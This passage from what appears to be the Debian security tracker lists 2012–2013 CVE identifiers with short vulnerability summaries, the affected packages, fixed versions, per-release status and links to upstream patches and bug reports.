	[squeeze] - chicken (Minor issue)
CVE-2012-6124
	RESERVED
	- chicken 4.8.0-1 (low; bug #702410)
	[wheezy] - chicken (Minor issue)
	[squeeze] - chicken (Minor issue)
CVE-2012-6123
	RESERVED
	- chicken 4.8.0-1 (low; bug #702410)
	[wheezy] - chicken (Minor issue)
	[squeeze] - chicken (Minor issue)
CVE-2012-6122
	RESERVED
	- chicken (low; bug #702410)
	[wheezy] - chicken (Minor issue)
	[squeeze] - chicken (Minor issue)
CVE-2012-6121 (Cross-site scripting (XSS) vulnerability in Roundcube Webmail before ...)
	- roundcube (vulnerable code not in stable or testing)
	NOTE: http://trac.roundcube.net/ticket/1488850
	NOTE: Upstream patch: https://github.com/roundcube/roundcubemail/commit/74cd0a9b62f11bc07c5a1d3ba0098b54883eb0ba
CVE-2012-6120 (Red Hat OpenStack Essex and Folsom creates the /var/log/puppet ...)
	- puppet 2.6.4-2
	[squeeze] - puppet (Minor issue)
	NOTE: puppet-common postinst in unstable sets dpkg-statoverride --update --add puppet puppet 0750 /var/log/puppet
	NOTE: After starting puppetmaster permissions on directory are restricted
CVE-2012-6119 (Candlepin before 0.7.24, as used in Red Hat Subscription Asset Manager ...)
	NOTE: Candlepin
CVE-2012-6118 (The Administer tab in Aeolus Conductor allows remote authenticated ...)
	NOT-FOR-US: Aeolus Cloud Configuration tool (not the pipe organ simulator in Debian)
CVE-2012-6117 (Aeolus Configuration Server, as used in Red Hat CloudForms Cloud ...)
	NOT-FOR-US: Aeolus Cloud Configuration tool (not the pipe organ simulator in Debian)
CVE-2012-6116 (modules/certs/manifests/config.pp in katello-configure before ...)
	NOTE: Candlepin
CVE-2012-6115 (The domain management tool (rhevm-manage-domains) in Red Hat ...)
	NOTE: RHEV management tool
CVE-2012-6114 [temp file vulnerability in git-extras]
	RESERVED
	- git-extras 1.7.0-1.2 (bug #698490)
CVE-2012-6113 (The openssl_encrypt function in ext/openssl/openssl.c in PHP 5.3.9 ...)
	- php5 5.4.0~beta2-1
	[squeeze] - php5 (Introduced in 5.3.9)
	NOTE: Introduced in http://git.php.net/?p=php-src.git;a=commitdiff;h=095cbc48a8f0090f3b0abc6155f2b61943c9eafb
	NOTE: Fixed in 5.3.14 http://git.php.net/?p=php-src.git;a=commitdiff;h=270a406ac94b5fc5cc9ef59fc61e3b4b95648a3e
	NOTE: https://bugs.launchpad.net/ubuntu/+source/php5/+bug/1099793
	NOTE: https://bugs.php.net/bug.php?id=61413
CVE-2012-6112 (classes/GoogleSpell.php in the PHP Spellchecker (aka Google ...)
	- tinymce (TinyMCE Google spellchecker plugin)
	- wordpress 3.5.1+dfsg-2
	- moodle (bug #702387)
	[squeeze] - wordpress (bug #701667)
	[squeeze] - moodle (Only affects 2.1 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
	NOTE: http://www.tinymce.com/develop/changelog/?type=phpspell
	NOTE: patch: https://github.com/tinymce/tinymce_spellchecker_php/commit/22910187bfb9edae90c26e10100d8145b505b974
	NOTE: http://www.tinymce.com/forum/viewtopic.php?id=30036
CVE-2012-6111 [gnome-keyring does not discard stored secrets in some cases]
	RESERVED
	- libgnome-keyring (low; bug #697896)
	[squeeze] - libgnome-keyring (Minor issue)
	[wheezy] - libgnome-keyring (Minor issue)
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/11/5
CVE-2012-6109 (lib/rack/multipart.rb in Rack before 1.1.4, 1.2.x before 1.2.6, 1.3.x ...)
	- ruby-rack 1.4.1-2.1 (bug #698440)
	- librack-ruby
CVE-2012-6108 [default permissions for /var/log/hp are too open]
	RESERVED
	- hplip (permissions are 755 on wheezy, sid and experimental)
CVE-2012-6107 [Does not verify that the server hostname matches a domain name in the subject's CN or subjectAltName field of the x.509 certificate]
	RESERVED
	- axis2c (bug #697974)
	NOTE: https://issues.apache.org/jira/browse/AXIS2C-1619
CVE-2012-6106 (calendar/managesubscriptions.php in the Manage Subscriptions ...)
	- moodle (Only affects 2.4)
CVE-2012-6105 (blog/rsslib.php in Moodle 2.1.x before 2.1.10, 2.2.x before 2.2.7, ...)
	- moodle (low; bug #702387)
	[squeeze] - moodle (Only affects 2.1 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6104 (blog/rsslib.php in Moodle 2.2.x before 2.2.7, 2.3.x before 2.3.4, and ...)
	- moodle (low; bug #702387)
	[squeeze] - moodle (Only affects 2.2 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6103 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	- moodle (low; bug #702387)
	[squeeze] - moodle (Only affects 2.2 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6102 (lib.php in the Submission comments plugin in the Assignment module in ...)
	- moodle (Only affects 2.3 and above)
CVE-2012-6101 (Multiple open redirect vulnerabilities in Moodle 2.2.x before 2.2.7, ...)
	- moodle (low; bug #702387)
	[squeeze] - moodle (Only affects 2.2 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6100 (report/outline/index.php in Moodle 2.2.x before 2.2.7, 2.3.x before ...)
	- moodle (low; bug #702387)
	[squeeze] - moodle (Only affects 2.2 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6099 (The moodle1 backup converter in backup/converter/moodle1/lib.php in ...)
	- moodle
	[squeeze] - moodle (Only affects 2.1 and above)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6098 (grade/edit/outcome/edit_form.php in Moodle 1.9.x through 1.9.19, 2.1.x ...)
	- moodle (low; bug #702387)
	[squeeze] - moodle (Minor issue)
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2
CVE-2012-6097 (File descriptor leak in cronie 1.4.8, when running in certain ...)
	- cronie (low; bug #697811)
	NOTE: Only present in experimental
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=786096
CVE-2012-6096 (Multiple stack-based buffer overflows in the get_history function in ...)
	{DSA-2653-1 DSA-2616-1}
	- icinga 1.7.1-5 (bug #697931)
	- nagios3 3.4.1-3 (bug #697930)
CVE-2012-6095 (ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows ...)
	{DSA-2606-1}
	- proftpd-dfsg 1.3.4a-3 (bug #697524)
CVE-2012-6094
	RESERVED
	- cups (systemd patch not applied in Debian, see bug #697584)
CVE-2012-6093 (The QSslSocket::sslErrors function in Qt before 4.6.5, 4.7.x before ...)
	- qt4-x11 (Only affects environments where a different OpenSSL is used, doesn't apply to Debian; bug #697582)
	NOTE: http://lists.qt-project.org/pipermail/announce/2013-January/000020.html
	NOTE: https://codereview.qt-project.org/#change,42461
	NOTE: Fixed in 4:4.8.2+dfsg-10
CVE-2012-6092 (Multiple cross-site scripting (XSS) vulnerabilities in the web demos ...)
	- activemq (Example code not shipped in .deb)
CVE-2012-6091
	RESERVED
CVE-2012-6090 (Multiple stack-based buffer overflows in the expand function in ...)
	- swi-prolog 5.10.4-5 (low; bug #697416)
	[squeeze] - swi-prolog 5.10.1-1+squeeze1
	NOTE: https://lists.iai.uni-bonn.de/pipermail/swi-prolog/2012/009428.html
	NOTE: http://www.swi-prolog.org/git/pl.git/commitdiff/b2c88972e7515ada025e97e7d3ce3e34f81cf33e
CVE-2012-6089 (Multiple stack-based buffer overflows in the canoniseFileName function ...)
	- swi-prolog 5.10.4-5 (low; bug #697416)
	[squeeze] - swi-prolog 5.10.1-1+squeeze1
	NOTE: https://lists.iai.uni-bonn.de/pipermail/swi-prolog/2012/009428.html
	NOTE: http://www.swi-prolog.org/git/pl.git/commitdiff/a9a6fc8a2a9cf3b9154b490a4b1ffaa8be4d723c
CVE-2012-6088 (The rpmpkgRead function in lib/package.c in RPM 4.10.x before 4.10.2 ...)
	- rpm 4.10.1-2.1 (bug #697375)
	[squeeze] - rpm (Introduced in rpm 4.10.0)
	[wheezy] - rpm 4.10.0-5+deb7u1
CVE-2012-6087 [moodle insecure curl usage]
	RESERVED
	- moodle
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy1
	NOTE: https://github.com/tpyo/amazon-s3-php-class/pull/36
CVE-2012-6086 [zabbix insecure curl usage]
	RESERVED
	- zabbix (bug #697443)
	NOTE: https://support.zabbix.com/browse/ZBX-5924
CVE-2012-6085 (The read_block function in g10/import.c in GnuPG 1.4.x before 1.4.13 ...)
	{DSA-2601-1}
	- gnupg 1.4.12-7 (bug #697108)
	- gnupg2 2.0.19-2 (bug #697251)
CVE-2012-6084 (modules/m_capab.c in (1) ircd-ratbox before 3.0.8 and (2) Charybdis ...)
	{DSA-2612-1}
	- charybdis 3.3.0-7.1 (bug #697092)
	- ircd-ratbox 3.0.7.dfsg-3 (bug #697093)
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/01/1
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/01/2
CVE-2012-6083
	RESERVED
	- freeciv (low; bug #696306)
	[squeeze] - freeciv (Minor issue)
	[wheezy] - freeciv (Minor issue)
CVE-2012-6082 (Cross-site scripting (XSS) vulnerability in the rsslink function in ...)
	{DSA-2593-1}
	- moin 1.9.5-2
	[wheezy] - moin 1.9.4-8+deb7u1
	NOTE: Fix http://hg.moinmo.in/moin/1.9/rev/c98ec456e493
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/29/7
CVE-2012-6081 (Multiple unrestricted file upload vulnerabilities in the (1) twikidraw ...)
	{DSA-2593-1}
	[wheezy] - moin 1.9.4-8+deb7u1
	- moin 1.9.5-3 (bug #696948)
	NOTE: Fix http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/29/6
CVE-2012-6080 (Directory traversal vulnerability in the _do_attachment_move function ...)
	{DSA-2593-1}
	[wheezy] - moin 1.9.4-8+deb7u1
	- moin 1.9.5-4 (bug #696949)
	NOTE: Fix http://hg.moinmo.in/moin/1.9/rev/3c27131a3c52
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/29/8
CVE-2012-6079
	RESERVED
	NOT-FOR-US: W3 Total Cache
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/3
CVE-2012-6078
	RESERVED
	NOT-FOR-US: W3 Total Cache
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/3
CVE-2012-6077
	RESERVED
	NOT-FOR-US: W3 Total Cache
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/3
CVE-2012-6076 (Inkscape before 0.48.4 reads .eps files from /tmp instead of the ...)
	- inkscape 0.48.3.1-1.3 (low; bug #654341)
	[squeeze] - inkscape (Minor issue)
	NOTE: https://bugs.launchpad.net/inkscape/+bug/911146
CVE-2012-6075 (Buffer overflow in the e1000_receive function in the e1000 device ...)
	{DSA-2619-1 DSA-2608-1 DSA-2607-1}
	- qemu 1.1.2+dfsg-4 (bug #696051)
	- qemu-kvm 1.1.2+dfsg-4 (bug #696051)
	- xen 4.1.3-8
	[squeeze] - xen (In Squeeze the code is in the package xen-qemu-dm-4.0)
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/1
CVE-2012-6074 (Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before ...)
	- jenkins 1.447.2+dfsg-3 (bug #696816)
	NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-11-20
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/28/1
CVE-2012-6073 (Open redirect vulnerability in CloudBees Jenkins before 1.491, Jenkins ...)
	- jenkins 1.447.2+dfsg-3 (bug #696816)
	NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-11-20
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/28/1
CVE-2012-6072 (CRLF injection vulnerability in CloudBees Jenkins before 1.491, ...)
	- jenkins 1.447.2+dfsg-3 (bug #696816)
	- jenkins-winstone 0.9.10-jenkins-37+dfsg-2 (bug #696974)
	NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-11-20
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/28/1
CVE-2012-6071 [libnusoap-php: Curl insecure usage]
	RESERVED
	- nusoap 0.7.3-5 (low; bug #696707)
	[squeeze] - nusoap (Minor issue)
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/26/1
CVE-2012-6070 [falconpl: Curl insecure usage]
	RESERVED
	- falconpl 0.9.6.9-git20120606-2 (bug #696681)
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/26/1
CVE-2011-5250
	RESERVED
CVE-2011-5249
	RESERVED
CVE-2011-5248
	RESERVED
CVE-2011-5247
	RESERVED
CVE-2009-5133
	RESERVED
CVE-2012-6069 (Directory traversal vulnerability in the Runtime Toolkit in CODESYS ...)
	NOT-FOR-US: CODESYS Runtime System
CVE-2012-6068 (The Runtime Toolkit in CODESYS Runtime System 2.3.x and 2.4.x does not ...)
	NOT-FOR-US: CODESYS Runtime System
CVE-2012-6067 (freeFTPd.exe in freeFTPd through 1.0.11 allows remote attackers to ...)
	NOT-FOR-US: freeFTPd
CVE-2012-6066 (freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to ...)
	NOT-FOR-US: freeFTPd
CVE-2012-6065 (The OM Maximenu module 6.x-1.43 and earlier for Drupal, when the ...)
	NOT-FOR-US: Drupal plugin
CVE-2012-6064 (Directory traversal vulnerability in ...)
	NOT-FOR-US: CMS Made Simple
CVE-2012-6063 (Double free vulnerability in the sftp_mkdir function in sftp.c in ...)
	{DSA-2577-1}
	- libssh 0.5.3-1
	[squeeze] - libssh 0.4.5-3+squeeze1
	NOTE: Fix included in CVE-2012-4559 patch
	NOTE: https://red.libssh.org/issues/84
	NOTE: http://git.libssh.org/projects/libssh.git/commit/?h=v0-5&id=4d8420f3282ed07fc99fc5e930c17df27ef1e9b2
CVE-2012-6062 (The dissect_rtcp_app function in epan/dissectors/packet-rtcp.c in the ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6061 (The dissect_wtp_common function in epan/dissectors/packet-wtp.c in the ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6060 (Integer overflow in the dissect_iscsi_pdu function in ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6059 (The dissect_isakmp function in epan/dissectors/packet-isakmp.c in the ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6058 (Integer overflow in the dissect_icmpv6 function in ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6057 (The dissect_eigrp_metric_comm function in ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6056 (Integer overflow in the dissect_sack_chunk function in ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6055 (epan/dissectors/packet-3g-a11.c in the 3GPP2 A11 dissector in ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6054 (The dissect_sflow_245_address_type function in ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6053 (epan/dissectors/packet-usb.c in the USB dissector in Wireshark 1.6.x ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2012-6052 (Wireshark 1.8.x before 1.8.4 allows remote attackers to obtain ...)
	- wireshark (unimportant)
	NOTE: not suitable for code injection
CVE-2011-5246
	RESERVED
CVE-2013-0100
	RESERVED
CVE-2013-0099
	RESERVED
CVE-2013-0098
	RESERVED
CVE-2013-0097
	RESERVED
CVE-2013-0096 (Writer in Microsoft Windows Essentials 2011 and 2012 allows remote ...)
	NOT-FOR-US: Microsoft
CVE-2013-0095 (Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for ...)
	NOT-FOR-US: Outlook in Microsoft Office for Mac
CVE-2013-0094 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0093 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0092 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0091 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0090 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0089 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0088 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0087 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0086 (Microsoft OneNote 2010 SP1 does not properly determine buffer sizes ...)
	NOT-FOR-US: Microsoft OneNote
CVE-2013-0085 (Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2013-0084 (Directory traversal vulnerability in Microsoft SharePoint Server 2010 ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2013-0083 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2013-0082
	RESERVED
CVE-2013-0081
	RESERVED
CVE-2013-0080 (Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 ...)
	NOT-FOR-US: Microsoft SharePoint
CVE-2013-0079 (Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute ...)
	NOT-FOR-US: Microsoft Visio Viewer
CVE-2013-0078 (The Microsoft Antimalware Client in Windows Defender on Windows 8 and ...)
	NOT-FOR-US: Microsoft Antimalware Client
CVE-2013-0077 (Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-0076 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-0075 (The TCP/IP implementation in Microsoft Windows Vista SP2, Windows ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-0074 (Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 ...)
	NOT-FOR-US: Microsoft Silverlight
CVE-2013-0073 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...)
	NOT-FOR-US: Microsoft .NET Framework
CVE-2013-0072
	RESERVED
CVE-2013-0071
	RESERVED
CVE-2013-0070
	RESERVED
CVE-2013-0069
	RESERVED
CVE-2013-0068
	RESERVED
CVE-2013-0067
	RESERVED
CVE-2013-0066
	RESERVED
CVE-2013-0065
	RESERVED
CVE-2013-0064
	RESERVED
CVE-2013-0063
	RESERVED
CVE-2013-0062
	RESERVED
CVE-2013-0061
	RESERVED
CVE-2013-0060
	RESERVED
CVE-2013-0059
	RESERVED
CVE-2013-0058
	RESERVED
CVE-2013-0057
	RESERVED
CVE-2013-0056
	RESERVED
CVE-2013-0055
	RESERVED
CVE-2013-0054
	RESERVED
CVE-2013-0053
	RESERVED
CVE-2013-0052
	RESERVED
CVE-2013-0051
	RESERVED
CVE-2013-0050
	RESERVED
CVE-2013-0049
	RESERVED
CVE-2013-0048
	RESERVED
CVE-2013-0047
	RESERVED
CVE-2013-0046
	RESERVED
CVE-2013-0045
	RESERVED
CVE-2013-0044
	RESERVED
CVE-2013-0043
	RESERVED
CVE-2013-0042
	RESERVED
CVE-2013-0041
	RESERVED
CVE-2013-0040
	RESERVED
CVE-2013-0039
	RESERVED
CVE-2013-0038
	RESERVED
CVE-2013-0037
	RESERVED
CVE-2013-0036
	RESERVED
CVE-2013-0035
	RESERVED
CVE-2013-0034
	RESERVED
CVE-2013-0033
	RESERVED
CVE-2013-0032
	RESERVED
CVE-2013-0031
	RESERVED
CVE-2013-0030 (The Vector Markup Language (VML) implementation in Microsoft Internet ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0029 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0028 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0027 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0026 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...)
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0025 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0024 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0023 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0022 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0021 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0020 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0019 (Use-after-free vulnerability in Microsoft Internet Explorer 7 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0018 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0017 RESERVED CVE-2013-0016 RESERVED CVE-2013-0015 (Microsoft Internet Explorer 6 through 9 does not properly perform ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0014 RESERVED CVE-2013-0013 (The SSL provider component in Microsoft Windows Vista SP2, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2013-0012 RESERVED CVE-2013-0011 (The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-0010 (Cross-site scripting (XSS) vulnerability in Microsoft System Center ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0009 (Cross-site scripting (XSS) vulnerability in Microsoft System Center ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0008 (win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) 
NOT-FOR-US: Microsoft Windows CVE-2013-0007 (Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0006 (Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0005 (The WCF Replace function in the Open Data (aka OData) protocol ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0004 (Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0003 (Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0002 (Buffer overflow in the Windows Forms (aka WinForms) component in ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0001 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-6051 (Google CityHash computes hash values without properly restricting the ...) - cityhash (bug #694999) CVE-2011-5373 REJECTED CVE-2011-5372 REJECTED CVE-2011-5371 REJECTED CVE-2011-5370 REJECTED CVE-2012-6050 (The winbox service in MikroTik RouterOS 5.15 and earlier allows remote ...) NOT-FOR-US: MikroTik RouterOS CVE-2012-6049 (Open Solution Quick.Cart 5.0 allows remote attackers to obtain ...) NOT-FOR-US: Open Solution Quick.Cart 5.0 CVE-2012-6048 (Guitar Pro 6.1.1 r10791 allows remote attackers to cause a denial of ...) NOT-FOR-US: Guitar Pro 6.1.1 CVE-2012-6047 (Cross-site request forgery (CSRF) vulnerability in X7 Chat 2.0.5.1 and ...) NOT-FOR-US: X7 Chat 2.0.5.1 CVE-2012-6046 (Static code injection vulnerability in admin/banners.php in PHP Enter ...) NOT-FOR-US: PHP Enter CVE-2012-6045 (Cross-site scripting (XSS) vulnerability in gb/user/index.php in Ramui ...) NOT-FOR-US: Ramui Forum CVE-2012-6044 (M-Player 0.4 allows remote attackers to cause a denial of service ...) 
NOT-FOR-US: M-Player (different from mplayer in the archive) CVE-2012-6043 (Cross-site scripting (XSS) vulnerability in downloads.php in ...) NOT-FOR-US: phpFusion CVE-2012-6042 (GPSMapEdit 1.1.73.2 allows user-assisted remote attackers to cause a ...) NOT-FOR-US: GPSMapEdit CVE-2012-6041 (Double free vulnerability in GreenBrowser before 6.0.1002, when the ...) NOT-FOR-US: GreenBrowser CVE-2012-6040 (Cross-site scripting (XSS) vulnerability in users.php in File King ...) NOT-FOR-US: File King Advanced File Management 1.4 CVE-2012-6039 (SQL injection vulnerability in view_comments.php in YABSoft Advanced ...) NOT-FOR-US: YABSoft Advanced Image Hosting CVE-2012-6038 (admin/core/admin_func.php in razorCMS before 1.2.1 does not properly ...) NOT-FOR-US: razorCMS CVE-2010-5286 (Directory traversal vulnerability in Jstore (com_jstore) component for ...) NOT-FOR-US: Joomla jstore CVE-2010-5285 (Cross-site request forgery (CSRF) vulnerability in admin.php in ...) - collabtive (low; bug #695348) [wheezy] - collabtive (Minor issue) CVE-2010-5284 (Multiple cross-site scripting (XSS) vulnerabilities in Collabtive ...) - collabtive 0.7.6-1 (bug #695348) NOTE: Might be fixed earlier, but 0.7.6 was tested CVE-2010-5283 (Cross-site request forgery (CSRF) vulnerability in OpenText ECM ...) NOT-FOR-US: OpenText ECM CVE-2010-5282 (Multiple cross-site scripting (XSS) vulnerabilities in OpenText ECM ...) NOT-FOR-US: OpenText ECM CVE-2010-5281 (Directory traversal vulnerability in ibrowser.php in the CMScout 2.09 ...) NOT-FOR-US: CMScout IBrowser TinyMCE Plugin CVE-2010-5280 (Directory traversal vulnerability in the Community Builder Enhanced ...) NOT-FOR-US: CBE for Joomla CVE-2012-6037 (Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x ...) {DSA-2591-1} - mahara 1.5.1-3 CVE-2012-6036 (The (1) memc_save_get_next_page, (2) tmemc_restore_put_page and (3) ...) 
- xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6035 (The do_tmem_destroy_pool function in the Transcendent Memory (TMEM) in ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6034 (The (1) tmemc_save_get_next_page and (2) tmemc_save_get_next_inv ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6033 (The do_tmem_control function in the Transcendent Memory (TMEM) in Xen ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6032 (Multiple integer overflows in the (1) tmh_copy_from_client and (2) ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6031 (The do_tmem_get function in the Transcendent Memory (TMEM) in Xen 4.0, ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6030 (The do_tmem_op function in the Transcendent Memory (TMEM) in Xen 4.0, ...) 
- xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: CVE-2012-3497 has been SPLIT into this ID and others NOTE: TMEM not supported for production systems (technology preview) CVE-2012-6029 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: Cisco NAC Appliance CVE-2012-6028 RESERVED CVE-2012-6027 RESERVED CVE-2012-6026 (The HTTP Profiler on the Cisco Aironet Access Point with software 15.2 ...) NOT-FOR-US: Cisco Aironet Access Point CVE-2012-6025 RESERVED CVE-2012-6024 RESERVED CVE-2012-6023 RESERVED CVE-2012-6022 RESERVED CVE-2012-6021 RESERVED CVE-2012-6020 RESERVED CVE-2012-6019 RESERVED CVE-2012-6018 RESERVED CVE-2012-6017 RESERVED CVE-2012-6016 RESERVED CVE-2012-6015 RESERVED CVE-2012-6014 RESERVED CVE-2012-6013 RESERVED CVE-2012-6012 RESERVED CVE-2012-6011 RESERVED CVE-2012-6010 RESERVED CVE-2012-6009 RESERVED CVE-2012-6008 RESERVED CVE-2012-6007 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Cisco CVE-2012-6006 RESERVED CVE-2012-6005 RESERVED CVE-2012-6004 RESERVED CVE-2012-6003 RESERVED CVE-2012-6002 RESERVED CVE-2012-6001 RESERVED CVE-2012-6000 RESERVED CVE-2012-5999 RESERVED CVE-2012-5998 RESERVED CVE-2012-5997 RESERVED CVE-2012-5996 RESERVED CVE-2012-5995 